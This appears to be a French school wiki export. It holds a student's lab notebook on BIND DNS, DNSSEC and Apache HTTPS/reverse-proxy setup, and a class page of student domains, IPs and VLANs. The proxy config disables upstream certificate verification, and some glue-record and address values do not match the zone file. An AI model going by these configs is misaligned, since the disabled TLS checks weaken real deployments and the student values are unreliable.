&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-serveur-maître-moon&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du serveur maître (Moon) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;default&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
    allow-transfer { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe47:bbe7;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    also-notify { &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe29:880f;&lt;br /&gt;
	2001:660:4401:60a0:216:3eff:fed6:4bc3;&lt;br /&gt;
    };&lt;br /&gt;
    notify yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Fichier de zone /etc/bind/zones/db.msalhi.online&lt;br /&gt;
$TTL 86400&lt;br /&gt;
@   IN  SOA ns1.msalhi.online. admin.msalhi.online. (&lt;br /&gt;
        2026020320  ; Serial INCRÉMENTÉ et corrigé&lt;br /&gt;
        3600        ; Refresh&lt;br /&gt;
        1800        ; Retry&lt;br /&gt;
        604800      ; Expire&lt;br /&gt;
        86400       ; Minimum TTL&lt;br /&gt;
    )&lt;br /&gt;
&lt;br /&gt;
; Serveurs de noms&lt;br /&gt;
@       IN  NS  ns1.msalhi.online.&lt;br /&gt;
@       IN  NS  ns1.merteuil.tech.&lt;br /&gt;
&lt;br /&gt;
; Enregistrements&lt;br /&gt;
@       IN  A       193.48.57.167&lt;br /&gt;
@       IN  AAAA    2001:660:4401:60a0:216:3eff:fe6f:f548&lt;br /&gt;
ns1     IN  A       193.48.57.167&lt;br /&gt;
ns1     IN  AAAA    2001:660:4401:60a0:216:3eff:fe6f:f548&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
www     IN  CNAME   msalhi.online.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# Vérification&lt;br /&gt;
named-checkzone msalhi.online /etc/bind/zones/db.msalhi.online&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-serveur-secondaire-solstice&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du serveur secondaire (Solstice) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type slave;&lt;br /&gt;
    file &amp;quot;/var/lib/bind/db.msalhi.online&amp;quot;;&lt;br /&gt;
    masters { 192.168.20.2; };  # IP de Moon&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Redémarrage et vérification&lt;br /&gt;
systemctl restart bind9&lt;br /&gt;
ls -la /var/lib/bind/db.msalhi.online&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-chez-le-registrar-gandi&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration chez le registrar Gandi ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+ Configuration DNS chez Gandi&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Type'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Valeur'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Description'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Nameservers&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Serveur DNS primaire&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;|&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns2.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Serveur DNS secondaire&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Glue Record 1&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| IPv6: 2001:660:4401:60a0:216:3eff:fe6f:f547&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Glue Record 2&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns2.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| IPv4: 193.48.57.167&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;sécurisation-de-site-web-par-certificat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Sécurisation de site Web par certificat ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;génération-du-csr-et-obtention-du-certificat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Génération du CSR et obtention du certificat ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Génération de la clé privée&lt;br /&gt;
openssl genrsa -out /etc/ssl/private/myserver.key 2048&lt;br /&gt;
&lt;br /&gt;
# Génération du CSR&lt;br /&gt;
openssl req -new -key /etc/ssl/private/myserver.key \&lt;br /&gt;
  -out /etc/ssl/private/server.csr&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-apache-sur-moon-https-direct-ipv6&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration Apache sur Moon (HTTPS direct IPv6) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/apache2/sites-available/msalhi-ssl.conf&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    ServerAlias www.msalhi.online&lt;br /&gt;
    Redirect permanent / https://msalhi.online/&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    ServerAlias www.msalhi.online&lt;br /&gt;
    &lt;br /&gt;
    DocumentRoot /var/www/html&lt;br /&gt;
    &lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem&lt;br /&gt;
    &lt;br /&gt;
    Header always set Strict-Transport-Security &amp;quot;max-age=63072000; includeSubDomains&amp;quot;&lt;br /&gt;
    Header always set X-Frame-Options DENY&lt;br /&gt;
    Header always set X-Content-Type-Options nosniff&lt;br /&gt;
    &lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/msalhi_ssl_error.log&lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/msalhi_ssl_access.log combined&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# Activation&lt;br /&gt;
a2enmod ssl&lt;br /&gt;
a2ensite msalhi-ssl.conf&lt;br /&gt;
systemctl restart apache2&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-proxy-inverse-sur-solstice-https-ipv4&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du proxy inverse sur Solstice (HTTPS IPv4) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/apache2/sites-available/msalhi-proxy.conf&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    Redirect permanent / https://msalhi.online/&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    &lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem&lt;br /&gt;
    &lt;br /&gt;
    SSLProxyEngine on&lt;br /&gt;
    ProxyPreserveHost On&lt;br /&gt;
    &lt;br /&gt;
    # Utilisation de l'URL avec nom de domaine comme demandé&lt;br /&gt;
    ProxyPass / https://msalhi.online/&lt;br /&gt;
    ProxyPassReverse / https://msalhi.online/&lt;br /&gt;
    &lt;br /&gt;
    SSLProxyVerify none&lt;br /&gt;
    SSLProxyCheckPeerCN off&lt;br /&gt;
    &lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/proxy_error.log&lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/proxy_access.log combined&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# Activation des modules&lt;br /&gt;
a2enmod proxy proxy_http ssl&lt;br /&gt;
a2ensite msalhi-proxy.conf&lt;br /&gt;
systemctl restart apache2&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;sécurisation-de-serveur-dns-par-dnssec&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Sécurisation de serveur DNS par DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-dnssec-automatique&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration DNSSEC automatique ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création du répertoire pour les clés&lt;br /&gt;
mkdir -p /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
&lt;br /&gt;
# Ajout dans named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;dnspol&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Politique DNSSEC dans named.conf.options&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Redémarrage et vérification&lt;br /&gt;
systemctl restart bind9&lt;br /&gt;
dig @localhost msalhi.online DNSKEY +dnssec&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;résultat-des-clés-dnssec-générées&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Résultat des clés DNSSEC générées ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;; Clés obtenues via : dig @localhost msalhi.online DNSKEY +dnssec&lt;br /&gt;
&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  256 3 13 Mi9LJ2JnnUciYfGEXoDuZ0ElzOigo+Fjxhf2I1+zxZqcn7SN1FxxGfFJ v4xNsU/YTvGgzf7ZWgWa29b+OQOSug==&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  257 3 13 QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhh HW0/c1dYroeZ9riJTyQcO859svIWRw==&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  257 3 13 Z4LE6oWmFPOb+QzklArdW7HWkH6kVrjIgrKYrJBMW3n6sMwwEG1YruHe SvmXJ9GwuFxhqtRu130iPse3wrJqyQ==&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;enregistrement-de-la-ksk-chez-gandi&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Enregistrement de la KSK chez Gandi ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+ Configuration DNSSEC chez Gandi&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Paramètre'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Valeur'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Algorithm&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| 13 (ECDSAP256SHA256)&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Flags&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| 257 (KSK)&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Public Key&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhhHW0/c1dYroeZ9riJTyQcO859svIWRw==&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Msalhi</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=12166</id>
		<title>SE4 IdO sécurité système/réseau 2025/2026</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=12166"/>
		<updated>2026-02-10T15:29:35Z</updated>

		<summary type="html">&lt;p&gt;Msalhi : /* Plan d'adressage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Répartition des binômes pour les travaux pratiques &amp;quot;administration système et réseau&amp;quot; =&lt;br /&gt;
&lt;br /&gt;
Préfixe des noms de machine : &amp;lt;code&amp;gt;SE4&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Domaines Internet à louer sur [[gandi.net]]. Identifiant &amp;lt;code&amp;gt;pifou&amp;lt;/code&amp;gt;. Regardez le montant prévu sur le compte avant de louer un domaine.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elève !! Nom de domaine&lt;br /&gt;
! Nom de machine de services !! Nom de machine mandataire&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinuxbtw.lol|| SE4.CachyOS||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || c2vts.fr|| SE4.C2||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || rs7.online|| SE4.RS7||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.shop|| SE4.Elf||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || deadpool.tech|| SE4.catwoman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI &amp;amp; Agathe HOUDUSSE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI &amp;amp; Marin GOURVEST&lt;br /&gt;
|-&lt;br /&gt;
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET &amp;amp; Thomas DELOBELLE&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI &amp;amp; Yassine YAHIANI &lt;br /&gt;
|-&lt;br /&gt;
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE &amp;amp; Tom MERIEN&lt;br /&gt;
|-&lt;br /&gt;
| SE4.superman|| 193.48.57.169|| Billel Cheklat &amp;amp; Antonin Biernacki&lt;br /&gt;
|-&lt;br /&gt;
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse &amp;amp; GAUTHIER Mario Sylainx S.&lt;br /&gt;
|-&lt;br /&gt;
| SE4.Solstice|| &amp;lt;code&amp;gt;193.48.57.167&amp;lt;/code&amp;gt;|| Mohamed Salhi &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des commutateurs virtuels =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé &lt;br /&gt;
|-&lt;br /&gt;
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24&lt;br /&gt;
|-&lt;br /&gt;
|PAYET / DELOBELLE&lt;br /&gt;
|pont_pacman&lt;br /&gt;
|192.168.10.0/24&lt;br /&gt;
|-&lt;br /&gt;
|MERIEN / VANGHELUWE&lt;br /&gt;
|pont_pere&lt;br /&gt;
|192.168.0.0/24&lt;br /&gt;
|-&lt;br /&gt;
|CHEKLAT / BIERNACKI&lt;br /&gt;
|pont_ironman&lt;br /&gt;
|192.168.69.0/24&lt;br /&gt;
|-&lt;br /&gt;
|SALHI&lt;br /&gt;
|pont_msalhi&lt;br /&gt;
|192.168.20.0/24&lt;br /&gt;
|-&lt;br /&gt;
|GOURVEST/GHAZALI&lt;br /&gt;
|pont_diviseur&lt;br /&gt;
|192.168.67.0/24&lt;br /&gt;
|-&lt;br /&gt;
|YAHIANI / TEPELI&lt;br /&gt;
|pontclio&lt;br /&gt;
|192.168.7.0/24&lt;br /&gt;
|-&lt;br /&gt;
|GAUTHIER / SOUOP METSE&lt;br /&gt;
|pont_rock&lt;br /&gt;
|192.168.50.0/24&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des réseaux virtuels =&lt;br /&gt;
&lt;br /&gt;
VLAN privés :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
| VLAN1 || 1&lt;br /&gt;
|-&lt;br /&gt;
| MV-PROMO || 2 &lt;br /&gt;
|-&lt;br /&gt;
|E1-Pierre&lt;br /&gt;
|11&lt;br /&gt;
|-&lt;br /&gt;
|E2-Agathe&lt;br /&gt;
|12&lt;br /&gt;
|-&lt;br /&gt;
|E5-Cedric&lt;br /&gt;
|15&lt;br /&gt;
|-&lt;br /&gt;
|E6-Thomas&lt;br /&gt;
|16&lt;br /&gt;
|-&lt;br /&gt;
|E9-Aurele&lt;br /&gt;
|19&lt;br /&gt;
|-&lt;br /&gt;
|E10-Tom&lt;br /&gt;
|20&lt;br /&gt;
|-&lt;br /&gt;
|E15-MSalhi&lt;br /&gt;
|25&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
VLAN communs avec l'école :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
| INTERCO1 || 530 &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Schéma de câblage =&lt;br /&gt;
&lt;br /&gt;
Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.&lt;br /&gt;
&lt;br /&gt;
= Plan d'adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6 &lt;br /&gt;
|-&lt;br /&gt;
| MV-PROMO || &amp;lt;code&amp;gt;193.48.57.160/27&amp;lt;/code&amp;gt; || &amp;lt;/code&amp;gt;2001:660:4401:60a0::/64&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| PoolPierre || &amp;lt;code&amp;gt;10.60.1.0/24&amp;lt;/code&amp;gt; || &amp;lt;/code&amp;gt;2001:660:4401:60a1::/64&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
| PoolAgathe || &amp;lt;code&amp;gt;10.60.2.0/24&amp;lt;/code&amp;gt; || &amp;lt;/code&amp;gt;2001:660:4401:60a2::/64&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|PoolCédric&lt;br /&gt;
|&amp;lt;code&amp;gt;10.60.5.0/24&amp;lt;/code&amp;gt;&lt;br /&gt;
|2001:660:4401:60a5::/64&lt;br /&gt;
|-&lt;br /&gt;
|PoolThomas&lt;br /&gt;
|&amp;lt;code&amp;gt;10.60.6.0/24&amp;lt;/code&amp;gt;&lt;br /&gt;
|2001:660:4401:60a6::/64&lt;br /&gt;
|-&lt;br /&gt;
|PoolSalhi&lt;br /&gt;
|&amp;lt;code&amp;gt;10.60.15.0/24&amp;lt;/code&amp;gt;&lt;br /&gt;
|2001:660:4401:60b1::/64&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Adresses IPv4 des éléments réseau dans VLAN1&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Elément !! Adresse &lt;br /&gt;
|-&lt;br /&gt;
| Routeur C9200-E304 || 172.27.0.1/16&lt;br /&gt;
|-&lt;br /&gt;
| Routeur C9200-E306 || 172.27.0.2/16&lt;br /&gt;
|-&lt;br /&gt;
| Borne Wi-Fi E306 || 172.27.0.3/16&lt;br /&gt;
|-&lt;br /&gt;
| Borne Wi-Fi E304 || 172.27.0.4/16&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Informations VRRP =&lt;br /&gt;
&lt;br /&gt;
Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.&lt;br /&gt;
&lt;br /&gt;
== VLAN des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Une seule instance VRRP dans le VLAN des machines virtuelles.&lt;br /&gt;
&lt;br /&gt;
Adresse IPv4 virtuelle : &amp;lt;code&amp;gt;193.48.57.162&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Routeur !! IPv4 propre &lt;br /&gt;
|-&lt;br /&gt;
| C9200 E304 || &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&lt;br /&gt;
|- &lt;br /&gt;
| C9200 E306 || &amp;lt;code&amp;gt;193.48.57.164&amp;lt;/code&amp;gt;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== VLAN ... ==&lt;/div&gt;</summary>
		<author><name>Msalhi</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=12165</id>
		<title>SE4 IdO sécurité système/réseau 2025/2026</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=12165"/>
		<updated>2026-02-10T15:29:20Z</updated>

		<summary type="html">&lt;p&gt;Msalhi : /* Plan d'adressage */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Répartition des binômes pour les travaux pratiques &amp;quot;administration système et réseau&amp;quot; =&lt;br /&gt;
&lt;br /&gt;
Préfixe des noms de machine : &amp;lt;code&amp;gt;SE4&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Domaines Internet à louer sur [[gandi.net]]. Identifiant &amp;lt;code&amp;gt;pifou&amp;lt;/code&amp;gt;. Regardez le montant prévu sur le compte avant de louer un domaine.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elève !! Nom de domaine&lt;br /&gt;
! Nom de machine de services !! Nom de machine mandataire&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinuxbtw.lol|| SE4.CachyOS||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || c2vts.fr|| SE4.C2||SE4.Garage&lt;br /&gt;
|-&lt;br /&gt;
